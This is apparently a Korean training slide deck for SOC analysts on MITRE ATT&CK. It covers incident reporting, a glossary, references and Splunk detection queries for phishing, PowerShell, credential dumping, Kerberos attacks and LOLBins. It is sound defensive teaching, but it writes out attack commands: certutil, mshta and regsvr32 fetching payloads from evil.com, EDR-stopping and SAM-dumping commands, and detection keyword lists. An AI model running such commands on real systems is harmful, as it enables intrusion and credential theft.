대표 예시 하나를 떠올려 실제 로그와 연결하기

치트시트 3: 30초 구두 설명 프레임

시작 → 진행 → 영향 → 다음 행동 — 4문장으로 어떤 사건도 설명 가능

PART 12 · 부록

①

시작점 (Start)

"본 사건은 [날짜·시간]에 [어떤 방법]으로 시작되었습니다."
예: "11월 15일 오전 9시, 스피어피싱 첨부파일 실행으로 시작되었습니다."

②

핵심 진행 (Progress)

"이후 [ATT&CK Technique들]이 확인되었습니다."
예: "PowerShell 실행(T1059.001), 내부 정찰(T1082), C2 Beaconing(T1071.001)이 순차 확인되었습니다."

③

영향 & 우려 (Impact)

"[어디까지 진행되었고] [무엇이 우려되는지]를 말합니다."
예: "Finance 서버까지 접근이 확인되었으며 데이터 유출이 우려됩니다."

④

다음 행동 (Action)

"지금 [무엇을 해야 하는지] 구체적 행동을 제시합니다."
예: "해당 호스트 격리와 C2 도메인 차단을 즉시 권고합니다."

연습 문장 예시 (완성형)

"11월 15일 09시 14분, 스피어피싱 첨부파일(T1566.001) 실행으로 시작된 이번 사건에서 PowerShell 실행(T1059.001)과 120초 주기 C2 Beaconing(T1071.001)이 연속 확인되었습니다. Finance 폴더 2.3GB가 Dropbox로 유출(T1567.002)된 것으로 추정되며, 해당 호스트 즉시 격리와 C2 도메인 차단을 권고합니다."

💡 연습법: 이 4단 구조를 반복 훈련하면 Q&A 질문에서도 흔들리지 않습니다. 발표 불안을 줄이는 가장 효과적인 방법입니다

보강 설명 분석가는 짧은 시간 안에 사건을 구조적으로 설명할 수 있어야 합니다. 이 4단 프레임을 몸에 익히면 어떤 사건도 30초 안에 설명할 수 있습니다. 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

30초 설명4단 프레임구두 보고

이해 포인트

30초 설명를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
4단 프레임 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

용어사전: 꼭 구분해야 할 핵심 용어 15개

ATT&CK 교육에서 가장 자주 혼동되는 용어를 짝으로 정리

PART 12 · 부록

용어	한 줄 정의
Tactic	공격 목적 — 왜 이 행동을 했는가 (TA ID)
Technique	공격 방법 — 어떻게 했는가 (T ID)
Sub-technique	세부 방법 — 어떤 구체적 형태인가 (T.xxx)
Procedure	실제 구현 사례 — 현실에서 어떻게 했는가
Data Source	탐지에 필요한 로그·센서의 주제 분류
Data Component	Data Source 안의 구체적 관찰 항목
Detection Strategy	방어자 관점의 탐지 설계 아이디어
Analytics	구체화된 탐지 조건 — 쿼리로 구현 가능한 수준

용어	한 줄 정의
Coverage	기술별 가시성과 탐지 품질 수준 (0~3)
Hunting	경보 전 가설로 탐지 공백을 능동 탐색
Confidence	매핑의 확신 정도 — 근거 밀도에 비례
Beaconing	C2와 주기적으로 통신하는 패턴
LOLBin	Living off the Land Binary — 정상 OS 도구 악용
Password Spraying	여러 계정에 소수 시도 — 잠금 우회 Brute Force
Purple Team	Red(공격)+Blue(방어)가 협력해 탐지 검증

보강 설명 ATT&CK 교육에서 가장 자주 헷갈리는 용어를 짧게 정리했습니다. 특히 Tactic과 Technique, Data Source와 Data… 조건·예외·운영 연결까지 보면 실무성이 높아집니다.

용어사전Tactic vs Techniq…Data Source vs Co…

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
용어사전·예외 조건·출력 필드를 함께 설계

추천 레퍼런스 & 업데이트 추적 방법

ATT&CK은 살아있는 지식베이스 — 공식 소스 우선, 분기별 업데이트 확인 습관

PART 12 · 부록

 공식 참고
attack.mitre.org — ATT&CK 공식 사이트, Enterprise Matrix
attack.mitre.org/versions — 버전 히스토리, 변경 로그
mitre-attack.github.io/attack-navigator — Navigator 웹앱
car.mitre.org — Cyber Analytics Repository (탐지 논리)
d3fend.mitre.org — 방어 기술 지식그래프


 운영 참고
NIST SP 800-61r3 — 사고 대응 가이드라인
github.com/SigmaHQ — 오픈소스 Sigma Rules
github.com/redcanaryco/atomic-red-team — 탐지 검증 도구
github.com/elastic/detection-rules — Elastic 탐지 룰
조직 내부 플레이북 & 로그 관리 가이드


 업데이트 추적 습관
분기별 ATT&CK 릴리즈 노트 확인
주요 Technique 페이지 Detection 변경 검토
KISA 보안공지 & 주요 CTI 보고서 구독
SIEM 탐지 룰의 ATT&CK ID 최신 여부 정기 점검
Purple Team 주기 운영 (분기 또는 반기)

📌 보완 참고: 벤더 탐지 콘텐츠(CrowdStrike, Microsoft Sentinel), 위협 인텔 보고서(Mandiant, Recorded Future), Purple Team 결과 문서

보강 설명 ATT&CK은 살아있는 지식베이스이므로 공식 소스와 업데이트 관찰 습관이 중요합니다. 공식 페이지를 먼저 보는 습관이 오래 가는 품질을 만든다고 설명해 주세요. 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

ATT&CK 공식 사이트MITRE CARSigma Rules

이해 포인트

ATT&CK 공식 사이트를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
MITRE CAR 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

최종 핵심 요약 8문장

ATT&CK ID 목록이 아니라 사건을 구조화하는 사고 습관이 이번 모듈의 진짜 산출물

PART 12 · 마무리

공격은 이벤트가 아니라 체인이다

단일 경보가 아닌 전체 흐름을 재구성하는 것이 분석의 핵심이다

ATT&CK은 공격자 행동을 읽는 지도다

판단을 대신하지 않고, 판단을 구조화하는 도구다

로그는 Technique를 직접 말하지 않는다

분석가가 행위와 목적을 구조화해 읽어야 한다

좋은 매핑은 근거와 Confidence를 함께 적는다

과감한 단정보다 투명한 불확실성 표기가 더 신뢰받는다

탐지 룰은 Technique를 운영 가능한 조건으로 번역한 것

좋은 룰은 만드는 것보다 튜닝하는 것이 더 중요하다

Hunting은 경보를 기다리지 않고 가설로 찾는 일이다

미발견도 중요한 Coverage 정보가 된다

Coverage는 탐지 공백과 운영 우선순위를 드러낸다

룰 개수가 아니라 검증된 탐지 품질로 측정한다

좋은 SOC 분석가는 ATT&CK으로 설명하고, 로그로 증명하고, 액션으로 끝낸다

이 세 가지가 곧 SOC 분석가의 핵심 역량이다

보강 설명이번 모듈에서 반드시 남겨야 할 것은 ATT&CK ID 목록이 아니라 사건을 구조화하는 사고 습관입니다. 정의·대표 Technique·추가 질문을 함께 정리해 두면 복습 효율이 올라갑니다.

핵심 요약공격은 체인ATT&CK은 지도

복습 포인트

핵심 요약 핵심 정의를 한 문장으로 다시 말하기
공격은 체인와 연결되는 대표 로그 또는 사례 1개 떠올리기
다음 슬라이드로 이어지는 질문을 스스로 만들기

암기보다 이해

왜 필요한지와 무엇을 판단하는지 구분하기
용어-목적-근거를 세 칸 표처럼 정리하기
팀원에게 설명해 보며 빈 구간을 찾기

학습 요소

ATT&CK은 지도 관련 ATT&CK ID·로그·조치를 묶어 기억하기
오탐 가능성과 탐지 공백도 함께 적어 두기
실제 현업 사례 1개와 연결해 기억 강화

수강 후 실무 적용 체크리스트

한 주에 하나씩 — 작은 실천이 쌓여서 SOC 역량이 된다

PART 12 · 마무리

 1주차 — 언어 바꾸기
☐ 사건 보고서·티켓에 ATT&CK 언어 일관되게 쓰기
☐ 기존 SIEM 경보에 ATT&CK Technique 태그 추가
☐ 팀 내 공통 매핑 워크시트 양식 제안
☐ attack.mitre.org 북마크 & 즐겨 보는 Technique 3개 선정


 2~4주차 — 탐지 개선
☐ 현재 보유 탐지 룰 Coverage 점수 매기기
☐ 점수 0~1인 Technique 3개 식별
☐ 그 중 1개의 탐지 룰 작성 or 로그 수집 추가
☐ 팀원과 Coverage 공백 공유 및 개선 계획 논의


 월 1회 — 헌팅 & 검증
☐ ATT&CK 기반 헌팅 가설 1개 수립 & 실행
☐ 결과를 팀 위키에 플레이북으로 문서화
☐ ATT&CK 버전 업데이트 확인 (릴리즈 노트)
☐ Atomic Red Team으로 탐지 룰 1개 검증

✅ 장기 목표: 실무 적용 1: 사건 보고서·티켓에 ATT&CK 언어 일관되게 쓰기 | 실무 적용 2: 탐지 룰과 헌팅 가설을 ATT&CK으로 정렬하기 | 실무 적용 3: Coverage 공백을 식별하고 개선 backlog로 운영하기

보강 설명 수강 후 실무에 바로 적용할 수 있는 체크리스트입니다. 한꺼번에 모든 것을 하려 하지 말고, 한 주에 하나씩 체크하면서 실무에 녹여가는 방식을 권장합니다. 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

실무 적용체크리스트ATT&CK 태그

이해 포인트

실무 적용를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
체크리스트 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

중간 정리: 분석가는 이벤트를 넘어 공격 흐름을 설명해야 한다

ATT&CK은 암기표가 아니라 해석·탐지·대응을 한 언어로 연결하는 실무 프레임

중간 정리

💡 핵심 메시지: ATT&CK을 안다는 것은 ID를 외우는 것이 아니라, 공격자 행동을 시간축으로 설명하고, 그 설명을 탐지 룰·헌팅 가설·대응 액션으로 바꾸는 능력을 갖추는 것입니다.

실무 적용 1

이벤트를 볼 때마다 “어느 Tactic/Technique에 해당하는가, 그 근거 로그는 무엇인가”를 같은 문장으로 기록합니다.

실무 적용 2

개별 경보를 끊어서 보지 말고, Initial Access → Execution → Persistence처럼 체인으로 이어 붙여 공격 흐름을 복원합니다.

실무 적용 3

탐지되지 않는 구간은 Coverage 공백으로 남기고, 데이터 소스·룰·플레이북 개선 항목으로 backlog화합니다.

이 페이지에서 꼭 남겨야 할 한 문장

보이는 이벤트를 나열하는 수준에서 끝나지 않고, 왜 이 행동이 중요하고 다음에 무엇을 해야 하는지까지 설명해야 합니다.
수강생 발표나 보고서에서는 ATT&CK 용어 + 로그 근거 + Confidence + 다음 조치가 한 세트로 묶여야 실무 문서가 됩니다.

보강 설명 이 페이지는 지금까지 배운 내용을 실무 언어로 다시 묶어 주는 정리 슬라이드입니다. ATT&CK을 외우는 것이 아니라 사건을 설명하고, 탐지 공백을 찾고, 대응 액션까지 이어 가는 사고방식을 한 번 더 강조해 주세요.

중간 정리공격 흐름실무 적용

설명 포인트

이벤트 단편이 아니라 공격 체인으로 말하기
로그 근거와 ATT&CK ID를 함께 제시하기
다음 대응 액션을 빠뜨리지 않기

현업 연결

보고 문장에 영향 범위와 우선순위를 함께 적기
탐지되지 않는 구간은 Coverage 공백으로 남기기
재발 방지용 룰 개선 항목까지 기록하기

강의 운영

수강생이 자기 말로 핵심 메시지를 다시 설명하게 하기
실제 로그 예시 1개를 붙여 발표시키기
다음 파트와 연결되는 질문을 던지기

T1566 Phishing 심층 분석: Sub-technique 유형별 비교

첨부파일 · 링크 · 서비스 채널 — 유형별로 탐지 포인트와 차단 전략이 다르다

Technique 심층

 T1566.001 Spearphishing Attachment
방식: 악성 첨부파일 직접 전달 (Office 매크로, PDF, ISO, LNK)
로그: 메일GW 첨부파일 해시, EDR 파일 생성
탐지: 의심 확장자·해시 차단, 샌드박스 분석
오탐: 정상 업무 첨부파일 (PDF, xlsx)
최근 트렌드: ISO/VHD 컨테이너로 Mark-of-the-Web 우회


 T1566.002 Spearphishing Link
방식: 악성 URL 클릭 유도 → 드라이브바이 다운로드 또는 자격증명 수집 페이지
로그: 메일GW URL, Proxy/DNS 클릭 후 방문 로그
탐지: URL 평판 검사, 클릭 후 다운로드 감지
오탐: 정상 링크 포함 뉴스레터, 업무 공유 URL
최근 트렌드: Google Drive·SharePoint URL로 필터 우회


 T1566.003 via Service
방식: Slack·Teams·LinkedIn·SMS 등 메일 외 채널 피싱
로그: CASB, 커뮤니케이션 플랫폼 DLP
탐지: 외부 사용자의 파일 전송, 악성 링크 공유
오탐: 정상 외부 협업, 고객과의 채널 소통
최근 트렌드: Teams 외부 사용자 기능 통한 피싱 급증

유형	대표 도구/방법	메일GW 탐지 가능?	EDR 탐지 포인트	Proxy/DNS 탐지?
T1566.001	xlsm 매크로, LNK, ISO	○ 첨부파일 샌드박스	Office→cmd/ps 체인	△ 다운로드 후
T1566.002	타이포도메인, 자격증명 페이지	△ URL 평판	브라우저→다운로드	○ DNS/Proxy 클릭
T1566.003	Teams 외부초대, LinkedIn DM	✗ 메일 우회	파일 실행 체인	△ CASB 필요

보강 설명 T1566 Phishing의 세 가지 Sub-technique를 비교합니다. 첨부파일, 링크, 서비스 채널 피싱은 탐지 포인트가 각각 다릅니다. 공격자는 메일 게이트웨이 정책에 따라… 시간 순서와 후속 조치를 같이 보면 공격 흐름이 더 또렷해집니다.

T1566T1566.001T1566.002

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
T1566 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

T1078 Valid Accounts 심층: 왜 탐지가 가장 어려운가

정상 자격증명 사용 → 시그니처 탐지 불가 → 행위 기반 이상 탐지만이 답이다

Technique 심층

왜 탐지가 어려운가

정상 사용자 계정으로 정상 프로토콜(VPN, RDP, 웹 로그인)을 통해 접근
MFA가 없거나 OTP를 탈취했다면 인증 자체도 정상
공격자가 업무 시간에 맞춰 활동하면 시간 이상도 없음
Brute Force나 멀웨어 흔적이 전혀 없어 이전 Technique 로그도 없을 수 있음
내부 이동 시 정상 도구(RDP, SMB)를 사용하면 Lateral Movement 탐지도 어려움

탐지 전략: UEBA 관점

접속 위치 이상: 평소와 다른 국가/IP 대역
시간 이상: 평소 접속 시간대와 크게 다름
디바이스 이상: 등록되지 않은 신규 단말
행동 이상: 접속 후 행위 패턴이 baseline과 다름 (대량 파일 접근 등)
불가능한 이동(Impossible Travel): 짧은 시간 내 지리적으로 불가능한 위치 변경

# Impossible Travel 탐지 쿼리 아이디어 (Splunk) index=vpn_auth | sort user, _time | streamstats last(country) as prev_country last(_time) as prev_time by user | eval time_diff = _time - prev_time | where country != prev_country AND time_diff < 10800 # 3시간 내 | table user, prev_country, country, time_diff

🚨 핵심 원칙: Valid Accounts는 단독 로그로는 탐지 불가. 반드시 baseline 대비 이상 탐지와 후속 행위 분석을 조합해야 한다

보강 설명 T1078 Valid Accounts는 ATT&CK에서 가장 탐지하기 어려운 Technique 중 하나입니다. 정상 자격증명을 사용하므로 시그니처 기반 탐지가 무의미합니다. 행위 기반 분석이 핵심입니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

T1078T1078 Valid Accou…행위 기반 탐지

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
T1078·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

T1059.001 PowerShell 심층: 탐지 레이어 4단계

커맨드라인 → 스크립트 블록 → 모듈 로깅 → AMSI — 레이어가 많을수록 탐지 정확도 높아진다

Technique 심층

①

커맨드 라인 탐지 (기본)

Data Component: Command Execution
EventID: Sysmon 1, WinEvent 4688
탐지: -Enc, -w hidden, -NoP, -NonI, IEX, DownloadString
한계: 인코딩·난독화로 우회 가능

②

Script Block Logging (권장)

EventID: 4104 (Microsoft-Windows-PowerShell)
특징: 디코딩 후 실제 실행 코드를 기록
설정: HKLM\...\PowerShell\ScriptBlockLogging 활성화
탐지: 실제 악성 코드 내용 분석 가능

③

Module Logging

EventID: 4103
특징: 파이프라인 실행 결과, 모듈별 호출 기록
한계: 로그 볼륨이 매우 커짐

④

AMSI (Antimalware Scan Interface)

런타임 메모리 기반 스크립트 스캔
EDR과 연동해 실행 전 악성 코드 차단
공격자 우회 시도: AMSI Bypass (T1562)

# Script Block Log 분석 (EventID 4104) index=winevent source="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode=4104 | search ScriptBlockText IN ("*IEX*", "*Invoke-Expression*", "*DownloadString*", "*WebClient*", "*[Convert]::FromBase64*", "*amsiContext*") # AMSI Bypass 시도 | table _time, ComputerName, ScriptBlockText

⚠️ 설정 확인 체크리스트:
☐ Script Block Logging 활성화 여부
☐ PowerShell v2 다운그레이드 방지 정책
☐ Constrained Language Mode 적용 여부
☐ AMSI 업체 연동 확인

보강 설명 PowerShell 탐지는 여러 레이어에서 동시에 이루어져야 합니다. 커맨드 라인 분석, 스크립트 블록 로깅, 모듈 로깅, AMSI를 통한 런타임 분석까지 여러 방어 레이어를… 조건·예외·후속 조치를 같이 봐야 탐지 품질이 올라갑니다.

T1059.001PowerShell Script…AMSI

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
T1059.001·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

T1003 OS Credential Dumping 심층: 방법별 탐지 전략

Mimikatz만이 아니다 — LSASS·SAM·DCSync·NTDS 방법별로 탐지 포인트가 다르다

Technique 심층

방법	Sub-tech	동작 원리	핵심 탐지 포인트
LSASS Memory	T1003.001	lsass.exe 프로세스 메모리를 읽어 해시·평문 비밀번호 추출 (Mimikatz sekurlsa)	① lsass.exe 대상 PROCESS_VM_READ 권한 요청 ② Sysmon EventID 10 (ProcessAccess)
SAM File	T1003.002	C:\Windows\System32\config\SAM 파일 복사 후 오프라인 크랙	① SAM/SECURITY 파일 직접 접근 ② reg save HKLM\SAM 명령 실행
NTDS.dit	T1003.003	DC의 AD 데이터베이스 파일 추출 → 전체 도메인 계정 해시	① ntdsutil, vssadmin 실행 ② NTDS.dit 파일 접근 감사
DCSync	T1003.006	도메인 복제 권한 악용해 DC로부터 해시 직접 요청 (네트워크만 사용)	① 비DC 호스트에서 MS-DRSR 프로토콜 사용 ② WinEvent 4662 (DS-Replication-Get-Changes)

# DCSync 탐지 (Splunk + WinEvent) index=winevent EventCode=4662 # 복제 권한 GUID Properties IN ("*1131f6aa-9c07-11d1-f79f-00c04fc2dcd2*", "*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2*") # DC 계정 제외 NOT SubjectUserName IN ("*$") | table _time, SubjectUserName, ObjectName

🚨 DCSync 특이점: 엔드포인트 로그 없이 네트워크 트래픽과 DC 이벤트 로그만으로 탐지. EDR 없이 네트워크 레이어 탐지가 중요한 드문 케이스

보강 설명 T1003 OS Credential Dumping은 Mimikatz로 대표되지만 실제로는 매우 다양한 방법이 있습니다. LSASS 메모리 덤프, SAM 파일 추출, DCSync 등… 조건·예외·후속 조치를 같이 봐야 탐지 품질이 올라갑니다.

T1003MimikatzLSASS Dump

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
T1003·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

T1071.004 DNS Tunneling 심층 분석

DNS 쿼리에 숨겨진 C2 통신 — 쿼리 길이·빈도·엔트로피로 탐지한다

Technique 심층

DNS Tunneling 동작 원리

명령 전달: cmd.Exec.dnscat2[.]com 형태의 서브도메인에 데이터 인코딩
결과 반환: DNS TXT, CNAME 응답 레코드에 데이터 포함
DNS 허용 정책 우회: UDP 53번 포트는 거의 모든 환경에서 허용
방화벽/프록시 우회: HTTP/HTTPS 차단 환경에서도 동작

# 정상 DNS 쿼리 www.google.com → 짧고 의미 있는 도메인 # DNS Tunneling 의심 쿼리 aGVsbG8gd29ybGQ.c2.evil.xyz → Base64 인코딩 서브도메인 xn--80abcdef1234567890.cmd.c2.xyz 특징: 길이 50+ chars, 높은 엔트로피, 같은 부모 도메인 반복

DNS Tunneling 탐지 지표

쿼리 길이: 서브도메인 부분이 비정상적으로 긴 경우 (보통 50자 이상)
높은 엔트로피: 랜덤 문자열처럼 보이는 서브도메인
쿼리 빈도: 같은 부모 도메인에 대한 비정상적으로 많은 서브도메인 쿼리
TXT 레코드 요청: TXT 쿼리 타입이 일반 클라이언트에서 비정상적으로 많음
NXDOMAIN 비율: 존재하지 않는 도메인 응답 다수

💡 탐지 쿼리 아이디어:
DNS 로그에서 서브도메인 길이 > 40자인 쿼리 필터링 → 같은 부모 도메인에서 1시간 내 100회 이상 → 부모 도메인 생성일과 평판 확인

보강 설명 DNS Tunneling은 DNS 쿼리에 데이터를 인코딩해 C2 통신이나 데이터 유출에 사용하는 기법입니다. DNS 트래픽은 대부분 허용되므로 탐지가 어렵습니다. 쿼리 길이, 빈도, 유형을 분석해야 합니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

T1071.004T1048.003DNS Tunneling

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
T1071.004 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

T1562.001 보안 도구 비활성화 심층: 탐지와 즉각 대응

보안 에이전트 중지는 공격 심각도의 급격한 상승 신호 — 즉각 대응 트리거로 설계해야 한다

Technique 심층

공격자의 보안 도구 비활성화 방법

서비스 중지: sc stop [EDR 서비스명], net stop
프로세스 강제 종료: taskkill /F /IM [에이전트.exe]
드라이버 제거: 커널 레벨 EDR 드라이버 강제 언로드
레지스트리 조작: 자동 시작 비활성화로 재부팅 후 에이전트 미기동
BYOVD: 취약한 합법 드라이버를 통한 커널 EDR 우회
GPO 조작: Windows Defender 정책 변경

# 탐지: 보안 서비스 중지 + 연속 이벤트 index=winevent EventCode=7036 ServiceName IN ("CrowdStrike*", "SentinelOne*", "Windows Defender*", "*EDR*") param2="stopped" | join ComputerName [search index=winevent EventCode=1102] # 에이전트 중지 + 로그 클리어 = 즉각 P1 경보

즉각 대응 플레이북

P1 경보 자동 발령: 보안 서비스 외부 중지 이벤트 감지 즉시
자동 격리: SOAR를 통한 해당 호스트 네트워크 격리
스냅샷 보존: VM 환경이면 즉시 메모리/디스크 스냅샷
에스컬레이션: 보안 리더 즉시 알림 (전화 포함)
포렌식 수집: 에이전트 중지 전·후 프로세스 목록, 네트워크 연결

🚨 Tamper Protection: CrowdStrike, SentinelOne 등은 Tamper Protection 기능으로 에이전트 자체 보호. 비활성화 되어 있다면 즉시 활성화 필요. 이 기능 없으면 관리자 권한만으로 에이전트 중지 가능

보강 설명 공격자가 EDR이나 AV를 우회하거나 비활성화하는 방법과 탐지 전략입니다. 보안 도구 비활성화는 공격의 심각도를 크게 높이는 신호이므로 즉각 대응이 필요합니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

T1562.001EDR 비활성화Tamper Protection

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
T1562.001·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

T1558 Kerberos 공격 심층: Kerberoasting & Golden Ticket

AD 환경 최대 위협 — Kerberoasting으로 시작해 Golden Ticket으로 도메인 장악까지

Technique 심층

T1558.003 Kerberoasting

원리: 서비스 계정(SPN 설정)의 TGS 티켓 요청 → 오프라인 크랙
조건: 도메인 일반 계정만 있으면 가능 (권한 상승 불필요)
탐지: 비DC에서 특정 SPN에 대한 RC4 암호화 TGS 대량 요청
WinEvent 4769: Ticket Options 0x40810000 + 암호화 타입 0x17(RC4)
완화: 서비스 계정 강력 비밀번호 정책, AES 암호화 강제

# Kerberoasting 탐지 index=winevent EventCode=4769 TicketEncryptionType=0x17 # RC4 TicketOptions=0x40810000 NOT ServiceName IN ("*$", "krbtgt") | stats dc(ServiceName) as unique_spn by ClientAddress | where unique_spn > 5 # 5개 이상 SPN

T1558.001 Golden Ticket

원리: krbtgt 계정 해시 탈취 → 위조된 TGT 생성 → 도메인 관리자 권한 위장
심각도: 유효 기간이 없어 krbtgt 비밀번호 2회 변경 전까지 지속
탐지: 존재하지 않는 계정·그룹 SID로 서비스 요청, 만료된 계정 인증 성공
WinEvent 4769 이상: PAC 구조 불일치, 비정상 티켓 수명
완화: krbtgt 비밀번호 정기 변경, PtH 방어, Privileged Access Workstation

🚨 Golden Ticket 발견 시: krbtgt 비밀번호를 48시간 간격으로 2회 연속 변경 필수. 1회만 변경하면 기존 TGT로 새 TGS 발급 가능

보강 설명 Kerberos 기반 공격은 Active Directory 환경에서 매우 위험합니다. Kerberoasting은 탐지가 어렵고, Golden Ticket은 한번 성공하면 도메인 전체… 조건·예외·후속 조치를 같이 봐야 탐지 품질이 올라갑니다.

T1558T1558.003T1558.001

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
T1558·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

T1218 LOLBin 심층: 정상 OS 도구 악용 패턴 카탈로그

시스템 기본 도구를 악용해 화이트리스트 우회 — 실행 컨텍스트가 탐지의 열쇠

Technique 심층

LOLBin	Sub-tech	악용 방법	탐지 포인트	정상 vs 의심 구분
`certutil.exe`	T1218	`certutil -urlcache -split -f http://evil.com/p.exe` URL에서 파일 다운로드	-urlcache 파라미터 + 외부 URL	정상: 인증서 관리 \| 의심: 외부 URL + 실행 파일
`mshta.exe`	T1218.005	원격 HTA 파일 실행으로 스크립트 실행 `mshta http://evil.com/x.hta`	외부 URL 파라미터, VBScript/JScript 실행	정상: 로컬 .hta \| 의심: 원격 URL
`regsvr32.exe`	T1218.010	Squiblydoo: `regsvr32 /s /n /u /i:http://evil.com/x.sct scrobj.dll`	/u /i 파라미터 조합, 원격 URL	정상: 로컬 DLL 등록 \| 의심: 원격 SCT 파일
`wmic.exe`	T1047	`wmic process call create "cmd.exe"` 원격 프로세스 생성	process call create 파라미터, 원격 호스트 지정	정상: 로컬 관리 \| 의심: 원격+비정상 실행
`bitsadmin.exe`	T1197	BITS 작업으로 파일 다운로드·실행 `bitsadmin /create /transfer`	외부 URL 다운로드 + 실행 파라미터	정상: Windows Update \| 의심: 비업무 도메인

탐지 원칙: 도구 자체를 차단하면 정상 운영 방해. 대신 실행 컨텍스트(부모 프로세스, 파라미터, 목적지 URL)로 정상·의심을 구분해야 한다

보강 설명 LOLBin(Living off the Land Binary)은 공격자가 시스템에 기본 내장된 정상 도구를 악용해 보안 탐지를 우회하는 기법입니다. T1218 System… 조건·예외·후속 조치를 같이 봐야 탐지 품질이 올라갑니다.

T1218LOLBincertutil

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
T1218·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

실전 로그 분석: SOC 필수 Windows EventID 카탈로그

매번 찾아보지 않아도 되도록 — SOC에서 가장 많이 참조하는 EventID를 패턴별로 정리

로그 분석 실전

EventID	의미	ATT&CK 연관	핵심 필드
4624	로그인 성공	T1078 Valid Accounts	LogonType, IpAddress, AccountName
4625	로그인 실패	T1110 Brute Force	FailureReason, TargetUserName, IpAddress
4648	명시적 자격증명 사용	T1550 Pass-the-Hash	SubjectUserName, TargetServerName
4672	특수 권한 로그인	T1078.002 Domain Accts	SubjectUserName, PrivilegeList
4688	프로세스 생성	T1059 Execution	NewProcessName, CommandLine, ParentProcessName
4698	예약 작업 등록	T1053.005	TaskName, TaskContent
4720	계정 생성	T1136 Create Account	TargetUserName, SubjectUserName
4728/4732	그룹 멤버 추가	T1098 Account Manip.	MemberName, GroupName

